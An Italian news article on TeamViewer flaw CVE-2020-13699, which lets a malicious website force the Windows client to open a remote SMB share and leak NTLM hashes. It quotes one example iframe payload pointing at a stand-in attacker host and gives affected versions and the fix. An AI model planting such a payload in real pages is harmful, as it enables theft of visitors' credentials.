Cover Image

Un bug di TeamViewer potrebbe essere sfruttato per decifrare la password degli utenti

6 Agosto 2020 - Tempo di lettura: 7 minuti

Una vulnerabilità ad alto rischio (CVE-2020-13699) in TeamViewer per Windows potrebbe essere sfruttata dagli aggressori remoti per decifrare la password degli utenti e, di conseguenza, portare a un ulteriore sfruttamento del sistema.

Informazioni su TeamViewer

TeamViewer è un'applicazione sviluppata dalla società tedesca TeamViewer GmbH ed è disponibile per sistemi operativi Windows, macOS, Linux, Chrome OS, iOS, Android, Windows RT Windows Phone 8 e BlackBerry.

Viene utilizzato principalmente per l'accesso remoto e il controllo di vari tipi di sistemi informatici e dispositivi mobili, ma offre anche funzionalità di collaborazione e presentazione (ad es. Condivisione desktop, conferenze Web, trasferimento file, ecc.)

Dall'avvento di COVID-19, l'uso aziendale del software è aumentato a causa del fatto che molti dipendenti sono costretti a lavorare da casa.

Informazioni sulla vulnerabilità (CVE-2020-13699)

CVE-2020-13699 è una debolezza della sicurezza derivante da un percorso o elemento di ricerca non quotato - più specificamente, è dovuto al fatto che l'applicazione non cita correttamente i suoi gestori URI personalizzati - e potrebbe essere sfruttata quando il sistema con una versione vulnerabile di TeamViewer installata visita un sito Web pericoloso.

"Un utente malintenzionato potrebbe incorporare un iframe dannoso in un sito Web con un URL predisposto ( iframe src='teamviewer10: --play \\attacker-IP\share\fake.tvs') che avvierebbe il client desktop Windows TeamViewer e lo costringerebbe ad aprire una condivisione SMB remota", ha spiegato Jeffrey Hofmann, un ingegnere della sicurezza presso Praetorian, che ha scoperto e responsabilmente rivelato il difetto.

"Windows eseguirà l'autenticazione NTLM all'apertura della condivisione SMB e tale richiesta può essere inoltrata (utilizzando uno strumento come il risponditore) per l'esecuzione del codice (o acquisita per il cracking dell'hash)."

Come notato prima, lo sfruttamento del difetto può essere avviato in remoto e non richiede alcuna autenticazione precedente. La falla sembra ideale per attacchi mirati ai pozzi d'acqua (come si chiamano in gergo).

Non ci sono indicazioni che questa vulnerabilità venga sfruttata in natura e non è attualmente disponibile alcun exploit pubblico.

Il CIS valuta che il rischio di sfruttamento è alto per enti governativi e commerciali di grandi e medie dimensioni, medio per enti governativi e aziende di piccole dimensioni e basso per utenti domestici.

Secondo l'azienda, la vulnerabilità interessa le versioni da 8 a 15 di TeamViewer (fino a 15.8.2) per la piattaforma Windows. Si consiglia agli utenti di eseguire l'aggiornamento alla versione 15.8.3 per correggere il bug.

intopic.it